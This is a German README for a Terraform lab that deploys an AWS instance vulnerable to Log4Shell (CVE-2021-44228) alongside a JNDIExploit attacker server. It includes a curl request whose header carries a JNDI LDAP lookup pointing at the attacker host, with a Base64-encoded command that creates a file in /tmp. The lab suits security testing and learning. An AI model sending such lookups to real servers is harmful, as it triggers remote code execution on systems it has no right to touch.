
Ein Terraform zum Bereitstellen einer verwundbaren App und ein JDNIExploit für die Arbeit mit CVE-2021-44228
Ein Terraform, das eine verwundbare App und einen JNDIExploit für CVE-2021-44228 bereitstellt.
Dieses Terraform erstellt zwei Instanzen in einer VPC in AWS Cloud.
Sie müssen lediglich Ihre AWS_ACCESS_KEY_ID und AWS_SECRET_ACCESS_KEY exportieren.
Eine Instanz ist JNDIExploit.
Die zweite ist eine Vulnerable-App für den log4j-Exploit.
Bitte ersetzen Sie vor dem Apply Ihren SSH-Public-Key in Terraform
terraform init
terraform plan
terraform apply --auto-approve
Nach der Bereitstellung in AWS können Sie die App mit einer Curl-Anfrage ausnutzen und die Dateierstellung in /tmp auf dem vulnerable-app-Container überprüfen.
curl ${vulnerable-app-IP}:8090 -H 'X-Api-Version: ${jndi:ldap://${JNDIExploit-IP}:1389/Basic/Command/Base64/dG91Y2ggL3RtcC9wd25lZAo=}'
Führen Sie auf dem Server der verwundbaren App den folgenden Befehl aus, um die Befehlsausführung zu überprüfen. Sie sollten die Datei sehen.
sudo docker exec -ti vulnerable-app ls /tmp